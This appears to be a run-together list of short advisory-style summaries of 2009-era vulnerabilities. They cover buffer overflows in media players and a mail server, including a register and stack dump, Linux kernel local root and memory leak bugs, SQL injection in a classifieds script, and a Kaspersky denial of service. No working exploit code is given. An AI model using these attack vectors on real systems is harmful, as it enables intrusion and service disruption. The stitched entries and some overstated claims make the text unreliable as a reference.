The problem appears when a specialy encoded 64base string is sent to the HTTP Mail Server. The ASM instructions show that EDX=48545541 and DS:[54516FF1]=???. The CPU registers show EAX 70F8FEFE, ECX 004212B8 mehttps.004212B8, EDX 48545541, EBX 003B2660, ESP 00BB2900, EBP 00BB2E20 ASCII "UATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUATQTEPUDUATEQEPUAT" and the stack shows 69736142, 45542063, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155, 55504551, 54515441, 44555045, 45544155.
This exploit is a buffer overflow vulnerability in Ultimate Player v 1.56 beta. It allows an attacker to execute arbitrary code by overflowing a buffer in the application. The exploit is triggered when a specially crafted .m3u or .upl file is opened by the application.
This exploit sends a malicious payload to the TFTP Server Service, which causes it to stop and has to be started again in Config. It was tested on Windows XP SP3.
A buffer overflow vulnerability exists in Swift Ultralite 1.032 when a specially crafted .M3U file is opened. The vulnerability is caused due to a boundary error when handling the file, which can be exploited to cause a stack-based buffer overflow by writing a large amount of data to the file. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .M3U file.
The Linux kernel before 2.6.31-rc7 does not initialize certain data structures within getname functions, which allows local users to read the contents of some kernel memory locations by calling getsockname on an AF_IRDA socket.
This exploit is a local ring0 root exploit for Linux kernel 2.6 < 2.6.19 (32bit). It was tested on White Box 4(2.6.9-5.ELsmp), CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp), Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5), Fedora Core 6(2.6.18-1.2798.fc6). It was discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team. The exploit was written by p0c73n1(at)gmail(dot)com.
This exploit is based on a local buffer overflow vulnerability in HTML Creator & Sender version 2.3 Build 697. The vulnerability is triggered when a maliciously crafted file is opened in the application. This can lead to arbitrary code execution in the context of the application.
This PoC exploits a buffer overflow vulnerability in uTorrent version 1.8.3 (Build 15772) by creating a malicious file containing a string of 9000 'A' characters. When the malicious file is added to the 'Source' field of the 'Create New Torrent' window, the buffer overflow occurs, potentially allowing an attacker to execute arbitrary code.
A vulnerability in Silurus Classifieds System allows an attacker to inject malicious SQL commands via the 'ID' parameter in the 'category.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to gain access to the system and/or disclose sensitive information.
The vulnerability affects Kaspersky Internet Security 2010 9.0.0.459 antivirus and its brother, the Kaspersky Antivirus 2010 9.0.0.463 version. The exploit was discovered on August 18th 2009. The problem with these two antivirus versions appears when parsing a URL address. Using a lot of consecutive dots inside the address.Kaspersky's native avp.exe process will soar CPU usage up to 100%. At first, traffic via the browser will get blocked, and eventually, if enough consecutive dots have been passed inside the URL address, the computer will crash. This exploit can be used inside HTML files, as normal href values or as img image sources. It will also work inside HTML email bodies. The code can be used remotely, and will lead to a Remote Memory Corruption/Denial-of-Service that could alter computer hardware or software.
Services By CQR